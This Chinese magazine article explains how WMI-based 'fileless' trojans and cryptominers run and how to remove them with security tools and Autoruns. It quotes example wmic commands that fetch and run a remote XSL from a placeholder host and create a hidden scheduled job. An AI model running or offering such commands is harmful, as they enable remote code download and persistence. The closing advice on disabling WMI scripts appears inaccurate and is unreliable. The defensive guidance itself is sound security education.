隱藏再深也不懼WMI木馬查殺實戰

俞木發

1.了解WMI惡意軟件的運行機制

如上所述，WMI具備的功能非常豐富，對于黑客來說只要利用其中的命令就可以完成很多操作。比如獲得相應的權限后，在目標電腦上使用“wmic os get /FORMAT："http：//www.xxxx.com：80/123.xsl"”命令就可以實現從網站服務器上下載所需的惡意軟件123.xsl（圖1）。

當然在實際運行中，這些惡意軟件還可以利用WMI進行更多的操作，如使用“wmicjobcallcreate"123.exe"，0，0，true，false，********154800.000000+480”命令創建一個在后臺運行的任務計劃，甚至可以執行創建系統服務、將DLL文件注入系統進程等操作。因為這里使用的都是系統命令（wmic.exe），并不像常規的木馬、病毒那樣由本體執行，所以稱之為“無文件”（嚴格來說是WMI腳本運行，腳本被觸發后執行下載木馬等操作）方式運行。比如臭名昭著的“KingMiner挖礦木馬”，它通過WMI事件訂閱來不斷地觸發木馬在后臺運行。

2.發現和識別WMI惡意軟件

WMI木馬的一個重要特性就是借助WMI腳本來下載或者激活木馬運行。比如某WMI挖礦木馬感染電腦后會在系統里生成一個任務計劃，任務會在后臺連接到服務器并下載挖礦木馬。挖礦木馬運行后會占用系統大量的資源和帶寬，導致Windows在日常使用時運行緩慢，網頁打開速度也變得很慢，且電腦的硬盤指示燈一直在閃爍（因為木馬會在后臺不斷地讀取數據）。如果自己的電腦在使用時有上述的異?，F象，那么就需要使用安全軟件檢查是否中了木馬。

Windows10用戶可以先使用系統自帶的“安全中心”進行查殺，如果無法解決問題則可以借助一些木馬專殺軟件，如火絨惡性木馬專殺工具（https：//bbs.huorong.cn/thread-18575-1-1.html）進行查殺，啟動軟件后點擊“立即掃描”，常見的木馬（包括WMI木馬）一般都可以被自動查殺（圖2）。

不過，如果中了WMI木馬，安全軟件只會將WMI腳本下載的木馬文件刪除，但是無法完全斬斷WMI木馬文件的下載途徑，如上述介紹的WMI挖礦木馬就是利用任務計劃進行下載。因為任務計劃中并沒有惡意軟件，安全軟件是不會將其刪除的，所以通過專殺軟件刪除木馬后，每次重啟系統掃描后還是一直提示發現木馬文件，那么就極可能中了WMI木馬，這時就還需要對系統的啟動項進行檢查，查看是否有異常的啟動項。

系統啟動項檢查可以借助Autoruns來完成（https：//docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns），啟動程序后它會自動對本機所有的啟動項目進行檢測，包括計劃任務、服務、WMI等（圖3）。

比如筆者公司的一臺電腦在執行安全掃描時就發現木馬文件無法徹底刪除的現象，在本機運行Autoruns后切換到“計劃任務”，在打開的窗口中就可以看到后臺所有的任務計劃。對于沒有數字簽名的任務，程序會使用淺紅色進行標注，可以看到本機中一個名為“lsmosee”的任務極為可疑，它加載的是本機臨時目錄中的一個VBS文件（圖4）。

在上圖選中“lsmosee”并右擊，選擇“跳轉到文件夾”，在打開的文件夾中根據圖上“鏡像路徑”的提示，使用記事本打開“54236.vbs”文件，其中顯示的正是一些WMI腳本的內容，它的作用就是在后臺定時下載木馬文件?，F在按提示將其刪除。接著返回上圖，選中“lsmosee”任務并點擊“刪除”，這樣就可以切斷木馬的下載通道。最后使用火絨安全軟件再掃描一遍電腦，刪除其他帶毒的文件后，問題得到順利地解決（圖5）。

3.一勞永逸封禁WMI木馬下載

WMI木馬難以查殺的原因就是由于它的下載方式是通過WMI腳本實現，而且WMI腳本激活的方法很多（如上例為任務計劃，有些則是使用進程注入等），不過WMI腳本的運行要依賴“WMI Performance Adapter”服務，因此對于個人用戶來說，可以通過停用服務的方法來禁止WMI腳本的運行。在桌面的任務欄搜索框中輸入“服務”，打開服務管理組件后找到上述服務，雙擊打開后將其停止，并將其啟動類型設置為“禁用”，這樣本機所有的WMI腳本就無法運行了（圖6）。